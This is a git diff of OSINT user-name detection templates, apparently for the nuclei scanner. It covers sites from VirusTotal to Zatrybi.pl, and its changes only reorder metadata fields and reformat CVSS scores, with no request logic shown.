a/http/osint/virustotal.yaml +++ b/http/osint/virustotal.yaml @@ -3,17 +3,18 @@ id: virustotal info: name: Virustotal User Name Information - Detect author: dwisiswant0 - description: Virustotal user name information check was conducted. severity: info + description: Virustotal user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,virustotal metadata: max-request: 1 + tags: osint,osint-misc,virustotal self-contained: true + http: - method: GET path: diff --git a/http/osint/visnesscard.yaml b/http/osint/visnesscard.yaml index 264a3cb7bb..e048c697f1 100644 --- a/http/osint/visnesscard.yaml +++ b/http/osint/visnesscard.yaml @@ -3,17 +3,18 @@ id: visnesscard info: name: Visnesscard User Name Information - Detect author: dwisiswant0 - description: Visnesscard user name information check was conducted. severity: info + description: Visnesscard user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-business,visnesscard metadata: max-request: 1 + tags: osint,osint-business,visnesscard self-contained: true + http: - method: GET path: diff --git a/http/osint/vivino.yaml b/http/osint/vivino.yaml index d66f74713c..cea769467c 100644 --- a/http/osint/vivino.yaml +++ b/http/osint/vivino.yaml @@ -3,17 +3,18 @@ id: vivino info: name: Vivino User Name Information - Detect author: dwisiswant0 - description: Vivino user name information check was conducted. severity: info + description: Vivino user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-video,vivino metadata: max-request: 1 + tags: osint,osint-video,vivino self-contained: true + http: - method: GET path: diff --git a/http/osint/vk.yaml b/http/osint/vk.yaml index d2d1e95dbc..91ff52d095 100644 --- a/http/osint/vk.yaml +++ b/http/osint/vk.yaml @@ -3,17 +3,18 @@ id: vk info: name: VK User Name Information - Detect author: dwisiswant0 - description: VK user name information check was conducted. severity: info + description: VK user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,vk metadata: max-request: 1 + tags: osint,osint-social,vk self-contained: true + http: - method: GET path: diff --git a/http/osint/vklworld-mastodon-instance.yaml b/http/osint/vklworld-mastodon-instance.yaml index 3c6678c747..0476f79d70 100644 --- a/http/osint/vklworld-mastodon-instance.yaml +++ b/http/osint/vklworld-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: vklworld-mastodon-instance info: name: Vkl.world (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Vkl.world (Mastodon Instance) user name information check was conducted. severity: info + description: Vkl.world (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,vklworld-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,vklworld-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/vmstio-mastodon-instance.yaml b/http/osint/vmstio-mastodon-instance.yaml index 292e2c21a8..f0750b428a 100644 --- a/http/osint/vmstio-mastodon-instance.yaml +++ b/http/osint/vmstio-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: vmstio-mastodon-instance info: name: Vmst.io (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Vmst.io (Mastodon Instance) user name information check was conducted. severity: info + description: Vmst.io (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,vmstio-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,vmstio-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/voice123.yaml b/http/osint/voice123.yaml index 800cc7bb75..9d5310a5f3 100644 --- a/http/osint/voice123.yaml +++ b/http/osint/voice123.yaml @@ -3,17 +3,18 @@ id: voice123 info: name: Voice123 User Name Information - Detect author: dwisiswant0 - description: Voice123 user name information check was conducted. severity: info + description: Voice123 user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,voice123 metadata: max-request: 1 + tags: osint,osint-hobby,voice123 self-contained: true + http: - method: GET path: diff --git a/http/osint/voicescom.yaml b/http/osint/voicescom.yaml index b0c93110cd..58c9201ac5 100644 --- a/http/osint/voicescom.yaml +++ b/http/osint/voicescom.yaml @@ -3,17 +3,18 @@ id: voicescom info: name: Voices.com User Name Information - Detect author: dwisiswant0 - description: Voices.com user name information check was conducted. severity: info + description: Voices.com user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-business,voicescom metadata: max-request: 1 + tags: osint,osint-business,voicescom self-contained: true + http: - method: GET path: diff --git a/http/osint/vsco.yaml b/http/osint/vsco.yaml index 4d0f24e9f4..8c1a246f5a 100644 --- a/http/osint/vsco.yaml +++ b/http/osint/vsco.yaml @@ -3,17 +3,18 @@ id: vsco info: name: Vsco User Name Information - Detect author: dwisiswant0 - description: Vsco user name information check was conducted. severity: info + description: Vsco user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,vsco metadata: max-request: 1 + tags: osint,osint-social,vsco self-contained: true + http: - method: GET path: diff --git a/http/osint/wanelo.yaml b/http/osint/wanelo.yaml index aac4c19a91..63883adbe5 100644 --- a/http/osint/wanelo.yaml +++ b/http/osint/wanelo.yaml @@ -3,17 +3,18 @@ id: wanelo info: name: Wanelo User Name Information - Detect author: dwisiswant0 - description: Wanelo user name information check was conducted. severity: info + description: Wanelo user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-shopping,wanelo metadata: max-request: 1 + tags: osint,osint-shopping,wanelo self-contained: true + http: - method: GET path: diff --git a/http/osint/warriorforum.yaml b/http/osint/warriorforum.yaml index 7ed712203a..e0ddfe02b0 100644 --- a/http/osint/warriorforum.yaml +++ b/http/osint/warriorforum.yaml @@ -3,17 +3,18 @@ id: warriorforum info: name: Warriorforum User Name Information - Detect author: dwisiswant0 - description: Warriorforum user name information check was conducted. severity: info + description: Warriorforum user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,warriorforum metadata: max-request: 1 + tags: osint,osint-hobby,warriorforum self-contained: true + http: - method: GET path: diff --git a/http/osint/watchmemorecom.yaml b/http/osint/watchmemorecom.yaml index 67996d83b8..baf66bb61c 100644 --- a/http/osint/watchmemorecom.yaml +++ b/http/osint/watchmemorecom.yaml @@ -3,17 +3,18 @@ id: watchmemorecom info: name: Watchmemore.com User Name Information - Detect author: dwisiswant0 - description: Watchmemore.com user name information check was conducted. severity: info + description: Watchmemore.com user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,watchmemorecom metadata: max-request: 1 + tags: osint,osint-porn,watchmemorecom self-contained: true + http: - method: GET path: diff --git a/http/osint/watchmyfeed.yaml b/http/osint/watchmyfeed.yaml index 43cd70be5e..da36b31483 100644 --- a/http/osint/watchmyfeed.yaml +++ b/http/osint/watchmyfeed.yaml @@ -3,17 +3,18 @@ id: watchmyfeed info: name: Watchmyfeed User Name Information - Detect author: dwisiswant0 - description: Watchmyfeed user name information check was conducted. severity: info + description: Watchmyfeed user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,watchmyfeed metadata: max-request: 1 + tags: osint,osint-porn,watchmyfeed self-contained: true + http: - method: GET path: diff --git a/http/osint/wattpad.yaml b/http/osint/wattpad.yaml index 6510cc9ab8..0bf604cfa6 100644 --- a/http/osint/wattpad.yaml +++ b/http/osint/wattpad.yaml @@ -3,17 +3,18 @@ id: wattpad info: name: Wattpad User Name Information - Detect author: dwisiswant0 - description: Wattpad user name information check was conducted. severity: info + description: Wattpad user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,wattpad metadata: max-request: 1 + tags: osint,osint-social,wattpad self-contained: true + http: - method: GET path: diff --git a/http/osint/weasyl.yaml b/http/osint/weasyl.yaml index 7ab98deb83..ef7040f295 100644 --- a/http/osint/weasyl.yaml +++ b/http/osint/weasyl.yaml @@ -3,17 +3,18 @@ id: weasyl info: name: Weasyl User Name Information - Detect author: dwisiswant0 - description: Weasyl user name information check was conducted. severity: info + description: Weasyl user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-images,weasyl metadata: max-request: 1 + tags: osint,osint-images,weasyl self-contained: true + http: - method: GET path: diff --git a/http/osint/weebly.yaml b/http/osint/weebly.yaml index a67c3c6a6f..1554837f96 100644 --- a/http/osint/weebly.yaml +++ b/http/osint/weebly.yaml @@ -3,17 +3,18 @@ id: weebly info: name: Weebly User Name Information - Detect author: dwisiswant0 - description: Weebly user name information check was conducted. severity: info + description: Weebly user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,weebly metadata: max-request: 1 + tags: osint,osint-misc,weebly self-contained: true + http: - method: GET path: diff --git a/http/osint/wego.yaml b/http/osint/wego.yaml index d7065f18cb..4d0a2dd11a 100644 --- a/http/osint/wego.yaml +++ b/http/osint/wego.yaml @@ -3,17 +3,18 @@ id: wego info: name: Wego User Name Information - Detect author: dwisiswant0 - description: Wego user name information check was conducted. severity: info + description: Wego user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-political,wego metadata: max-request: 1 + tags: osint,osint-political,wego self-contained: true + http: - method: GET path: diff --git a/http/osint/weheartit.yaml b/http/osint/weheartit.yaml index 17581a3cf5..4aca57e7aa 100644 --- a/http/osint/weheartit.yaml +++ b/http/osint/weheartit.yaml @@ -3,17 +3,18 @@ id: weheartit info: name: Weheartit User Name Information - Detect author: dwisiswant0 - description: Weheartit user name information check was conducted. severity: info + description: Weheartit user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,weheartit metadata: max-request: 1 + tags: osint,osint-social,weheartit self-contained: true + http: - method: GET path: diff --git a/http/osint/weibo.yaml b/http/osint/weibo.yaml index 1ceb6ba0d0..cb6492b951 100644 --- a/http/osint/weibo.yaml +++ b/http/osint/weibo.yaml @@ -3,17 +3,18 @@ id: weibo info: name: Weibo User Name Information - Detect author: dwisiswant0 - description: Weibo user name information check was conducted. severity: info + description: Weibo user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,weibo metadata: max-request: 1 + tags: osint,osint-social,weibo self-contained: true + http: - method: GET path: diff --git a/http/osint/wetransfer.yaml b/http/osint/wetransfer.yaml index 0a2701bd7d..7bf3225321 100644 --- a/http/osint/wetransfer.yaml +++ b/http/osint/wetransfer.yaml @@ -3,17 +3,18 @@ id: wetransfer info: name: WeTransfer User Name Information - Detect author: dwisiswant0 - description: WeTransfer user name information check was conducted. severity: info + description: WeTransfer user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,wetransfer metadata: max-request: 1 + tags: osint,osint-misc,wetransfer self-contained: true + http: - method: GET path: diff --git a/http/osint/wikidot.yaml b/http/osint/wikidot.yaml index 2053f34c88..2ac2f74fa0 100644 --- a/http/osint/wikidot.yaml +++ b/http/osint/wikidot.yaml @@ -3,17 +3,18 @@ id: wikidot info: name: Wikidot User Name Information - Detect author: dwisiswant0 - description: Wikidot user name information check was conducted. severity: info + description: Wikidot user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,wikidot metadata: max-request: 1 + tags: osint,osint-social,wikidot self-contained: true + http: - method: GET path: diff --git a/http/osint/wikipedia.yaml b/http/osint/wikipedia.yaml index 66db783db6..91a62be9db 100644 --- a/http/osint/wikipedia.yaml +++ b/http/osint/wikipedia.yaml @@ -3,17 +3,18 @@ id: wikipedia info: name: Wikipedia User Name Information - Detect author: dwisiswant0 - description: Wikipedia user name information check was conducted. severity: info + description: Wikipedia user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-news,wikipedia metadata: max-request: 1 + tags: osint,osint-news,wikipedia self-contained: true + http: - method: GET path: diff --git a/http/osint/wimkin-publicprofile.yaml b/http/osint/wimkin-publicprofile.yaml index 8726e8bd30..8f035b8a6c 100644 --- a/http/osint/wimkin-publicprofile.yaml +++ b/http/osint/wimkin-publicprofile.yaml @@ -3,17 +3,18 @@ id: wimkin-publicprofile info: name: Wimkin-PublicProfile User Name Information - Detect author: dwisiswant0 - description: Wimkin-PublicProfile user name information check was conducted. severity: info + description: Wimkin-PublicProfile user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-political,wimkin-publicprofile metadata: max-request: 1 + tags: osint,osint-political,wimkin-publicprofile self-contained: true + http: - method: GET path: diff --git a/http/osint/wireclub.yaml b/http/osint/wireclub.yaml index 14b9830147..8edea40db3 100644 --- a/http/osint/wireclub.yaml +++ b/http/osint/wireclub.yaml @@ -3,17 +3,18 @@ id: wireclub info: name: Wireclub User Name Information - Detect author: dwisiswant0 - description: Wireclub user name information check was conducted. severity: info + description: Wireclub user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,wireclub metadata: max-request: 1 + tags: osint,osint-social,wireclub self-contained: true + http: - method: GET path: diff --git a/http/osint/wishlistr.yaml b/http/osint/wishlistr.yaml index c4fa05e3e5..d29f6b04b7 100644 --- a/http/osint/wishlistr.yaml +++ b/http/osint/wishlistr.yaml @@ -3,17 +3,18 @@ id: wishlistr info: name: Wishlistr User Name Information - Detect author: dwisiswant0 - description: Wishlistr user name information check was conducted. severity: info + description: Wishlistr user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-shopping,wishlistr metadata: max-request: 1 + tags: osint,osint-shopping,wishlistr self-contained: true + http: - method: GET path: diff --git a/http/osint/wolni-slowianie.yaml b/http/osint/wolni-slowianie.yaml index 630b0d2258..900646e081 100644 --- a/http/osint/wolni-slowianie.yaml +++ b/http/osint/wolni-slowianie.yaml @@ -3,17 +3,18 @@ id: wolni-slowianie info: name: Wolni Słowianie User Name Information - Detect author: dwisiswant0 - description: Wolni Słowianie user name information check was conducted. severity: info + description: Wolni Słowianie user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,wolni-slowianie metadata: max-request: 1 + tags: osint,osint-social,wolni-slowianie self-contained: true + http: - method: GET path: diff --git a/http/osint/wordnik.yaml b/http/osint/wordnik.yaml index dc978b3de1..27bd2c8a91 100644 --- a/http/osint/wordnik.yaml +++ b/http/osint/wordnik.yaml @@ -3,17 +3,18 @@ id: wordnik info: name: Wordnik User Name Information - Detect author: dwisiswant0 - description: Wordnik user name information check was conducted. severity: info + description: Wordnik user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,wordnik metadata: max-request: 1 + tags: osint,osint-gaming,wordnik self-contained: true + http: - method: GET path: diff --git a/http/osint/wordpress-support.yaml b/http/osint/wordpress-support.yaml index 5d8bc196d7..e6a57d7bd2 100644 --- a/http/osint/wordpress-support.yaml +++ b/http/osint/wordpress-support.yaml @@ -3,17 +3,18 @@ id: wordpress-support info: name: WordPress Support User Name Information - Detect author: dwisiswant0 - description: WordPress Support user name information check was conducted. severity: info + description: WordPress Support user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-blog,wordpress-support metadata: max-request: 1 + tags: osint,osint-blog,wordpress-support self-contained: true + http: - method: GET path: diff --git a/http/osint/wordpress.yaml b/http/osint/wordpress.yaml index 6155f0cbf5..560b4e3389 100644 --- a/http/osint/wordpress.yaml +++ b/http/osint/wordpress.yaml @@ -3,17 +3,18 @@ id: wordpress info: name: WordPress User Name Information - Detect author: dwisiswant0 - description: WordPress user name information check was conducted. severity: info + description: WordPress user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-blog,wordpress metadata: max-request: 1 + tags: osint,osint-blog,wordpress self-contained: true + http: - method: GET path: diff --git a/http/osint/wowhead.yaml b/http/osint/wowhead.yaml index c9eb70b8ee..f31ccf16f0 100644 --- a/http/osint/wowhead.yaml +++ b/http/osint/wowhead.yaml @@ -3,17 +3,18 @@ id: wowhead info: name: Wowhead User Name Information - Detect author: dwisiswant0 - description: Wowhead user name information check was conducted. severity: info + description: Wowhead user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,wowhead metadata: max-request: 1 + tags: osint,osint-gaming,wowhead self-contained: true + http: - method: GET path: diff --git a/http/osint/wykop.yaml b/http/osint/wykop.yaml index b7b8013eb2..c5e3d839e3 100644 --- a/http/osint/wykop.yaml +++ b/http/osint/wykop.yaml @@ -3,17 +3,18 @@ id: wykop info: name: Wykop User Name Information - Detect author: dwisiswant0 - description: Wykop user name information check was conducted. severity: info + description: Wykop user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,wykop metadata: max-request: 1 + tags: osint,osint-social,wykop self-contained: true + http: - method: GET path: diff --git a/http/osint/xanga.yaml b/http/osint/xanga.yaml index 695d7b0edf..865df791f2 100644 --- a/http/osint/xanga.yaml +++ b/http/osint/xanga.yaml @@ -3,17 +3,18 @@ id: xanga info: name: Xanga User Name Information - Detect author: dwisiswant0 - description: Xanga user name information check was conducted. severity: info + description: Xanga user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-blog,xanga metadata: max-request: 1 + tags: osint,osint-blog,xanga self-contained: true + http: - method: GET path: diff --git a/http/osint/xbox-gamertag.yaml b/http/osint/xbox-gamertag.yaml index 66cfa31542..f0491bf5de 100644 --- a/http/osint/xbox-gamertag.yaml +++ b/http/osint/xbox-gamertag.yaml @@ -3,17 +3,18 @@ id: xbox-gamertag info: name: Xbox Gamertag User Name Information - Detect author: dwisiswant0 - description: Xbox Gamertag user name information check was conducted. severity: info + description: Xbox Gamertag user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,xbox-gamertag metadata: max-request: 1 + tags: osint,osint-gaming,xbox-gamertag self-contained: true + http: - method: GET path: diff --git a/http/osint/xhamster.yaml b/http/osint/xhamster.yaml index fe085d065c..1411876433 100644 --- a/http/osint/xhamster.yaml +++ b/http/osint/xhamster.yaml @@ -3,17 +3,18 @@ id: xhamster info: name: XHamster User Name Information - Detect author: dwisiswant0 - description: XHamster user name information check was conducted. severity: info + description: XHamster user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,xhamster metadata: max-request: 1 + tags: osint,osint-porn,xhamster self-contained: true + http: - method: GET path: diff --git a/http/osint/xing.yaml b/http/osint/xing.yaml index 6c3ac76db2..c24b134c49 100644 --- a/http/osint/xing.yaml +++ b/http/osint/xing.yaml @@ -3,17 +3,18 @@ id: xing info: name: Xing User Name Information - Detect author: dwisiswant0 - description: Xing user name information check was conducted. severity: info + description: Xing user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,xing metadata: max-request: 1 + tags: osint,osint-social,xing self-contained: true + http: - method: GET path: diff --git a/http/osint/xvideos-models.yaml b/http/osint/xvideos-models.yaml index 33a623108a..4b87b132c4 100644 --- a/http/osint/xvideos-models.yaml +++ b/http/osint/xvideos-models.yaml @@ -3,17 +3,18 @@ id: xvideos-models info: name: XVIDEOS-models User Name Information - Detect author: dwisiswant0 - description: XVIDEOS-models user name information check was conducted. severity: info + description: XVIDEOS-models user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,xvideos-models metadata: max-request: 1 + tags: osint,osint-porn,xvideos-models self-contained: true + http: - method: GET path: diff --git a/http/osint/xvideos-profiles.yaml b/http/osint/xvideos-profiles.yaml index 09bb62169a..c462fc222b 100644 --- a/http/osint/xvideos-profiles.yaml +++ b/http/osint/xvideos-profiles.yaml @@ -3,17 +3,18 @@ id: xvideos-profiles info: name: XVIDEOS-profiles User Name Information - Detect author: dwisiswant0 - description: XVIDEOS-profiles user name information check was conducted. severity: info + description: XVIDEOS-profiles user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,xvideos-profiles metadata: max-request: 1 + tags: osint,osint-porn,xvideos-profiles self-contained: true + http: - method: GET path: diff --git a/http/osint/yahoo-japan-auction.yaml b/http/osint/yahoo-japan-auction.yaml index 5397dc87ae..55546c3734 100644 --- a/http/osint/yahoo-japan-auction.yaml +++ b/http/osint/yahoo-japan-auction.yaml @@ -3,17 +3,18 @@ id: yahoo-japan-auction info: name: Yahoo! JAPAN Auction User Name Information - Detect author: dwisiswant0 - description: Yahoo! JAPAN Auction user name information check was conducted. severity: info + description: Yahoo! JAPAN Auction user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-shopping,yahoo-japan-auction metadata: max-request: 1 + tags: osint,osint-shopping,yahoo-japan-auction self-contained: true + http: - method: GET path: diff --git a/http/osint/yapishu.yaml b/http/osint/yapishu.yaml index 19f5a51cd9..666c313b95 100644 --- a/http/osint/yapishu.yaml +++ b/http/osint/yapishu.yaml @@ -3,17 +3,18 @@ id: yapishu info: name: Yapishu User Name Information - Detect author: dwisiswant0 - description: Yapishu user name information check was conducted. severity: info + description: Yapishu user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,yapishu metadata: max-request: 1 + tags: osint,osint-hobby,yapishu self-contained: true + http: - method: GET path: diff --git a/http/osint/yazawaj.yaml b/http/osint/yazawaj.yaml index 5e0feb82ed..a89a68e3a8 100644 --- a/http/osint/yazawaj.yaml +++ b/http/osint/yazawaj.yaml @@ -3,17 +3,18 @@ id: yazawaj info: name: Yazawaj User Name Information - Detect author: dwisiswant0 - description: Yazawaj user name information check was conducted. severity: info + description: Yazawaj user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-dating,yazawaj metadata: max-request: 1 + tags: osint,osint-dating,yazawaj self-contained: true + http: - method: GET path: diff --git a/http/osint/yelp.yaml b/http/osint/yelp.yaml index 147beba75b..59dcfce7de 100644 --- a/http/osint/yelp.yaml +++ b/http/osint/yelp.yaml @@ -3,17 +3,18 @@ id: yelp info: name: Yelp User Name Information - Detect author: dwisiswant0 - description: Yelp user name information check was conducted. severity: info + description: Yelp user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-shopping,yelp metadata: max-request: 1 + tags: osint,osint-shopping,yelp self-contained: true + http: - method: GET path: diff --git a/http/osint/yeswehack.yaml b/http/osint/yeswehack.yaml index 7c77babf84..345c21eaf7 100644 --- a/http/osint/yeswehack.yaml +++ b/http/osint/yeswehack.yaml @@ -8,13 +8,14 @@ info: Yeswehack user name information check was conducted. Detection will work if the profile is set to be public. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 tags: osint,osint-tech,yeswehack self-contained: true + http: - method: GET path: diff --git a/http/osint/youpic.yaml b/http/osint/youpic.yaml index 74b5be1017..e9dac42f26 100644 --- a/http/osint/youpic.yaml +++ b/http/osint/youpic.yaml @@ -3,17 +3,18 @@ id: youpic info: name: Youpic User Name Information - Detect author: dwisiswant0 - description: Youpic user name information check was conducted. severity: info + description: Youpic user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,youpic metadata: max-request: 1 + tags: osint,osint-hobby,youpic self-contained: true + http: - method: GET path: diff --git a/http/osint/youtube.yaml b/http/osint/youtube.yaml index d3ec70ff01..b68dd956fa 100644 --- a/http/osint/youtube.yaml +++ b/http/osint/youtube.yaml @@ -3,17 +3,18 @@ id: youtube info: name: YouTube User Name Information - Detect author: dwisiswant0 - description: YouTube user name information check was conducted. severity: info + description: YouTube user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-video,youtube metadata: max-request: 3 + tags: osint,osint-video,youtube self-contained: true + http: - method: GET path: diff --git a/http/osint/zatrybipl.yaml b/http/osint/zatrybipl.yaml index 7f925a5e7c..2342a42a37 100644 --- a/http/osint/zatrybipl.yaml +++ b/http/osint/zatrybipl.yaml @@ -3,17 +3,18 @@ id: zatrybipl info: name: Zatrybi.pl User Name Information - Detect author: dwisiswant0 - description: Zatrybi.pl user name information check was conducted. severity: info + description: Zatrybi.pl user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 